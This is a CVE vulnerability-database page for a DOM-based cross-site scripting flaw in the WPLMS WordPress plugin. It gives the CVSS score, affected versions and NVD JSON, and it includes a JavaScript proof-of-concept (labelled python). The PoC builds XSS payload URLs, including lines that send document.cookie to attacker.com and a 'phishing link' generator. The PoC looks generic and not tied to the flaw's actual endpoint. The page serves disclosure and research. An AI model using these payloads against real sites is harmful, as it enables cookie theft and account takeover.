Security Vulnerability Report
中文
CVE-2025-63035 CVSS 6.5 MEDIUM

CVE-2025-63035

Published: 2025-12-09 16:18:09
Last Modified: 2026-01-30 18:15:57

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VibeThemes WPLMS wplms_plugin allows DOM-Based XSS.This issue affects WPLMS: from n/a through <= 1.9.9.5.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:vibethemes:wordpress_learning_management_system:*:*:*:*:*:wordpress:*:* - VULNERABLE
WPLMS <= 1.9.9.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-63035 DOM-based XSS PoC for WPLMS Plugin // Target: WordPress WPLMS Plugin <= 1.9.9.5.4 const http = require('http'); // Malicious URL construction function constructXSSPayload() { // Basic XSS payload that alerts document.cookie const baseUrl = 'http://target-wordpress-site.com'; const vulnerableEndpoint = '/course/'; // Payload variations const payloads = [ '?search=<script>alert(document.domain)</script>', '?id=<img src=x onerror=alert(document.cookie)>', '?query=<svg/onload=alert(document.cookie)>', '?course=<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' ]; return payloads.map(payload => baseUrl + vulnerableEndpoint + payload); } // Generate phishing link with encoded payload function generatePhishingLink(attackerDomain) { const encodedPayload = encodeURIComponent('<script>document.location="' + attackerDomain + '?cookie="+document.cookie</script>'); return `http://target-site.com/course/?ref=${encodedPayload}`; } // Display generated PoC URLs console.log('[+] CVE-2025-63035 WPLMS DOM-XSS PoC'); console.log('[+] Target: WPLMS Plugin <= 1.9.9.5.4\n'); constructXSSPayload().forEach((url, i) => { console.log(`Payload ${i + 1}: ${url}`); }); console.log(`\nPhishing Link: ${generatePhishingLink('https://attacker.com')}`); console.log('\n[!] Note: Requires victim interaction to trigger the XSS');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63035", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:09.053", "lastModified": "2026-01-30T18:15:56.697", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VibeThemes WPLMS wplms_plugin allows DOM-Based XSS.This issue affects WPLMS: from n/a through <= 1.9.9.5.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vibethemes:wordpress_learning_management_system:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.9.9.5.4", "matchCriteriaId": "9D5C26DB-8C6D-4340-856D-84D63240F039"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wplms_plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-4-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}